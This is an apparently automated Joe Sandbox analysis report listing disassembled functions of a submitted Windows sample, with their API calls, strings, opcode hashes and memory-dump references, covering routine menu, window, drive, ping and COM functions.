Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: c6f0483deb62ee3f3d4a35c7415c5e9ba6a8f305098a15b9df238dec6850818d
Instruction ID: f96c68f7815254db0e7835114eef67413d595a004fc41bf6b97a3a4b2a5b3a5a
Opcode Fuzzy Hash: c6f0483deb62ee3f3d4a35c7415c5e9ba6a8f305098a15b9df238dec6850818d
Instruction Fuzzy Hash: F861AE30111A08DFCB359F28C988B29B7F2FB49705F10652DE6527BA70C7B4B892EB50

Function 00EA21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00EA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EA25EC

GetSysColor.USER32(0000000F), ref: 00EA21D3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 64d4e72b3e292966d817b1a1f73783fc8f14446cd2f91385479a53a0edb6d20f
Instruction ID: 845b56203bab70ea3812b92e6711994c10f19f7b034d380c82c6d0f44d5db4dd
Opcode Fuzzy Hash: 64d4e72b3e292966d817b1a1f73783fc8f14446cd2f91385479a53a0edb6d20f
Instruction Fuzzy Hash: CD418E31100144DBDB255F2CAC88BB93B66EB0A325F185269FE65BE1F1D7319C46EB21

Function 00F0A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F2F910), ref: 00F0A90B
GetDriveTypeW.KERNEL32(00000061,00F589A0,00000061), ref: 00F0A9D5
_wcscpy.LIBCMT ref: 00F0A9FF

Strings

network, xrefs: 00F0A969
fixed, xrefs: 00F0A953
removable, xrefs: 00F0A93D
cdrom, xrefs: 00F0A927
unknown, xrefs: 00F0A996
all, xrefs: 00F0A911
ramdisk, xrefs: 00F0A97F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 917a05e6f22923fc9d5ffd828d6ebbaaeecfe69cdc468f7d31628704cfe29a10
Instruction ID: 7b6b08b8e9c77c53e312cc0688f5d3d600b13f6dbf4b68c20421e78609549c4c
Opcode Fuzzy Hash: 917a05e6f22923fc9d5ffd828d6ebbaaeecfe69cdc468f7d31628704cfe29a10
Instruction Fuzzy Hash: 0551B0316183019BC300EF14C992AAFB7E5EF85750F50582DF9956B2E2DB31E90AEB53

Function 00EA9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00EA9862
__swprintf.LIBCMT ref: 00EA98AC
__i64tow.LIBCMT ref: 00EDF5E6

Strings

%.15g, xrefs: 00EA98A6
True, xrefs: 00EDF5A7
False, xrefs: 00EDF5AE
0x%p, xrefs: 00EDF5C8

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: e813025a501f6c0816a46635baf64bba779f3c4168adcac791ddd975fbbab20b
Instruction ID: faf86a6acab2114cb557b5ff94ff7cc451536bfa339ef9fc620b68b49e0e3cf3
Opcode Fuzzy Hash: e813025a501f6c0816a46635baf64bba779f3c4168adcac791ddd975fbbab20b
Instruction Fuzzy Hash: 8D41B7715002059FDB28DF34ED41E7677E8EF4A304F20546EE54AFA292EA36AD429711

Function 00F27152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2716A
CreateMenu.USER32 ref: 00F27185
SetMenu.USER32(?,00000000), ref: 00F27194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F27221
IsMenu.USER32(?), ref: 00F27237
CreatePopupMenu.USER32 ref: 00F27241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F2726E
DrawMenuBar.USER32 ref: 00F27276

Strings

F, xrefs: 00F27262
0, xrefs: 00F27160

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 29c3141f1b917f1d6a4385760e17ef43033714804cb708f651b8d5dc21ed6313
Instruction ID: 4fc5e567949fb9700535c4803d0bd31bfab7180e8a0ac925eb1d245753958c1e
Opcode Fuzzy Hash: 29c3141f1b917f1d6a4385760e17ef43033714804cb708f651b8d5dc21ed6313
Instruction Fuzzy Hash: E9416975A01219EFDB20DF64E944E9ABBB5FF49310F140028F955A73A1D731A914EFA0

Function 00F274BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F2755E
CreateCompatibleDC.GDI32(00000000), ref: 00F27565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F27578
SelectObject.GDI32(00000000,00000000), ref: 00F27580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F2758B
DeleteDC.GDI32(00000000), ref: 00F27594
GetWindowLongW.USER32(?,000000EC), ref: 00F2759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F275B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F275BE

Strings

static, xrefs: 00F274F6

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 7444a5827afb3692d53a99844c206c8a95da56cd500d652d9cf38c49c81de8e8
Instruction ID: e19742596065da8a4819344aa3b98572bf86ade274c112c5d7f9c380a3a3d234
Opcode Fuzzy Hash: 7444a5827afb3692d53a99844c206c8a95da56cd500d652d9cf38c49c81de8e8
Instruction Fuzzy Hash: 3B318132515228BBDF21AF64EC09FDB7B79FF09720F140228FA15960A0C735D815EB64

Function 00EC6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EC6E3E

Part of subcall function 00EC8B28: __getptd_noexit.LIBCMT ref: 00EC8B28

__gmtime64_s.LIBCMT ref: 00EC6ED7
__gmtime64_s.LIBCMT ref: 00EC6F0D
__gmtime64_s.LIBCMT ref: 00EC6F2A
__allrem.LIBCMT ref: 00EC6F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC6F9C
__allrem.LIBCMT ref: 00EC6FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC6FD1
__allrem.LIBCMT ref: 00EC6FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EC7006
__invoke_watson.LIBCMT ref: 00EC7077

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 14b227df7006a0513bd8a26e9f891628bf4a6faf884acc07bc1ceb11bc99162c
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 1E71E376A00716ABD714AE78DD42F5BB3E8EF04324F14922EF554F6281E772DA028B90

Function 00F02527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F02542
GetMenuItemInfoW.USER32(00F65890,000000FF,00000000,00000030), ref: 00F025A3
SetMenuItemInfoW.USER32(00F65890,00000004,00000000,00000030), ref: 00F025D9
Sleep.KERNEL32(000001F4), ref: 00F025EB
GetMenuItemCount.USER32(?), ref: 00F0262F
GetMenuItemID.USER32(?,00000000), ref: 00F0264B
GetMenuItemID.USER32(?,-00000001), ref: 00F02675
GetMenuItemID.USER32(?,?), ref: 00F026BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F02700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F02714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F02735

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 2d0d4f7c1d9ce7d36905f476c0c1351cc059b83a851946bdf27b3557cb796ded
Instruction ID: 8572a6a6ee1bb2f53b1cdeab3cb1e3ca21dd0261c479e9176be701d3927b655f
Opcode Fuzzy Hash: 2d0d4f7c1d9ce7d36905f476c0c1351cc059b83a851946bdf27b3557cb796ded
Instruction Fuzzy Hash: 75617C71900249AFDB61CFA4CD88EBE7BB8EB45314F140069E841A7291D736AD0AFB31

Function 00F26F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F26FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F26FA8
GetWindowLongW.USER32(?,000000F0), ref: 00F26FCC
_memset.LIBCMT ref: 00F26FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F26FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F27067

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: e06a96f50d5fbb2fb6c05c31f2cc053070e9c8eca69f952143519280fb4f35a1
Instruction ID: 73935eb9b87b3a54ac814f5f53c61bb41eae79621ac5c6c9f7644dbfd33eceac
Opcode Fuzzy Hash: e06a96f50d5fbb2fb6c05c31f2cc053070e9c8eca69f952143519280fb4f35a1
Instruction Fuzzy Hash: 22617971900218AFDB11DFA4DD81EEE77F8EF09710F100199FA14AB2A1D771AD45EBA0

Function 00EF6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EF6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00EF6C18
VariantInit.OLEAUT32(?), ref: 00EF6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00EF6C4A
VariantCopy.OLEAUT32(?,?), ref: 00EF6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00EF6CB1
VariantClear.OLEAUT32(?), ref: 00EF6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00EF6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF6CDC
VariantClear.OLEAUT32(?), ref: 00EF6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EF6CF9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 0b0598ec760b1d3e548e504f0be2b5a3308df2812557999920ad27072c5c944a
Instruction ID: 3f1c90896dd993cd26487dfaa7033feb75fbfcd81e47da248d8bd46c742cf28f
Opcode Fuzzy Hash: 0b0598ec760b1d3e548e504f0be2b5a3308df2812557999920ad27072c5c944a
Instruction Fuzzy Hash: 3E415231A0011D9FCF14EF64D8449AEBBB9EF08354F008079EA55E7261CB71AA46DFA0

Function 00F15732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F15793
inet_addr.WSOCK32(?,?,?), ref: 00F157D8
gethostbyname.WSOCK32(?), ref: 00F157E4
IcmpCreateFile.IPHLPAPI ref: 00F157F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F15862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F15878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F158ED
WSACleanup.WSOCK32 ref: 00F158F3

Strings

Ping, xrefs: 00F15816

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 02fba5ab4e69a241061f484af34292ed7a141f88c90f7e29b6afd4014880ef8c
Instruction ID: 3775e06589318e6197fbfb24301b940db2d46eaacc86855d7e139380ca243ce5
Opcode Fuzzy Hash: 02fba5ab4e69a241061f484af34292ed7a141f88c90f7e29b6afd4014880ef8c
Instruction Fuzzy Hash: AD518131A04700DFD720EF25DC45B6ABBE4EF89B20F044929F956EB2A1DB70E845EB51

Function 00F0B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F0B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F0B546
GetLastError.KERNEL32 ref: 00F0B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00F0B5BD

Strings

NOTREADY, xrefs: 00F0B57C
UNKNOWN, xrefs: 00F0B575
INVALID, xrefs: 00F0B58F
READY, xrefs: 00F0B596
READONLY, xrefs: 00F0B588

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: c36ba1fb9678547bc01ada4ada3b15598e22e08591db7a520a3367937fec2aea
Instruction ID: 7e5133499dc5424dce3986a2c49f9f6f8c138c484130e611a9bb954b4589ec8a
Opcode Fuzzy Hash: c36ba1fb9678547bc01ada4ada3b15598e22e08591db7a520a3367937fec2aea
Instruction Fuzzy Hash: 7B31A035A00209EFCB10DB68CC45ABE77B4FF49311F1841A6EA01AB2D5DB70AA06FB51

Function 00EF8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EF9014
GetDlgCtrlID.USER32 ref: 00EF901F
GetParent.USER32 ref: 00EF903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EF903E
GetDlgCtrlID.USER32(?), ref: 00EF9047
GetParent.USER32(?), ref: 00EF9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EF9066

Strings

ListBox, xrefs: 00EF8FD1
ComboBox, xrefs: 00EF8F9C

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 94f844a1d4bc61b42fb0b5f79c3a4f2c55fc54ace379396b6ea1e4a8a9c44a00
Instruction ID: d941b0a58c707ba684a36ccfdc5e68c837e2f6b8aefdc9798f316d6005f85746
Opcode Fuzzy Hash: 94f844a1d4bc61b42fb0b5f79c3a4f2c55fc54ace379396b6ea1e4a8a9c44a00
Instruction Fuzzy Hash: 7721B875A1020CBBDF15ABA0CC85EFEBBB5EF49310F100125BA61A72A1DF75581DDA21

Function 00EF907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EF90FD
GetDlgCtrlID.USER32 ref: 00EF9108
GetParent.USER32 ref: 00EF9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EF9127
GetDlgCtrlID.USER32(?), ref: 00EF9130
GetParent.USER32(?), ref: 00EF914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EF914F

Strings

ListBox, xrefs: 00EF90BC
ComboBox, xrefs: 00EF9087

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: c6901732200080fe9844f76c2c53c031adfb4fc3a835887c917c670a7f034278
Instruction ID: e311b5f5c3e6480a99bc2d401e6f15eb96e97d670adc0771a37b7b0e864406be
Opcode Fuzzy Hash: c6901732200080fe9844f76c2c53c031adfb4fc3a835887c917c670a7f034278
Instruction Fuzzy Hash: F921C875A0020CBBDF11ABA4CC85FFEBBB4EF49300F114025BA55AB2A2DB75541DEB20

Function 00EF9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00EF916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00EF9184
_wcscmp.LIBCMT ref: 00EF9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EF9211

Strings

largeicons, xrefs: 00EF91A5
details, xrefs: 00EF91BF
SHELLDLL_DefView, xrefs: 00EF9190
list, xrefs: 00EF91F3
smallicons, xrefs: 00EF91D9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 0f31d7ef063543950fce8e3f5495147d97975078db8eb94a9479419ebcef9713
Instruction ID: 7ff233a1d68599506d6e133b10f6286633d8f2726926f9e23b73b681ceac3fbd
Opcode Fuzzy Hash: 0f31d7ef063543950fce8e3f5495147d97975078db8eb94a9479419ebcef9713
Instruction Fuzzy Hash: 8411AB3A15830B79FA113624FC06FF7379C9B15725B20102AFF40B54E3EE5298566555

Function 00F188AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F188D7
CoInitialize.OLE32(00000000), ref: 00F18904
CoUninitialize.OLE32 ref: 00F1890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00F18A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F18B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F32C0C), ref: 00F18B6F
CoGetObject.OLE32(?,00000000,00F32C0C,?), ref: 00F18B92
SetErrorMode.KERNEL32(00000000), ref: 00F18BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F18C25
VariantClear.OLEAUT32(?), ref: 00F18C35

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
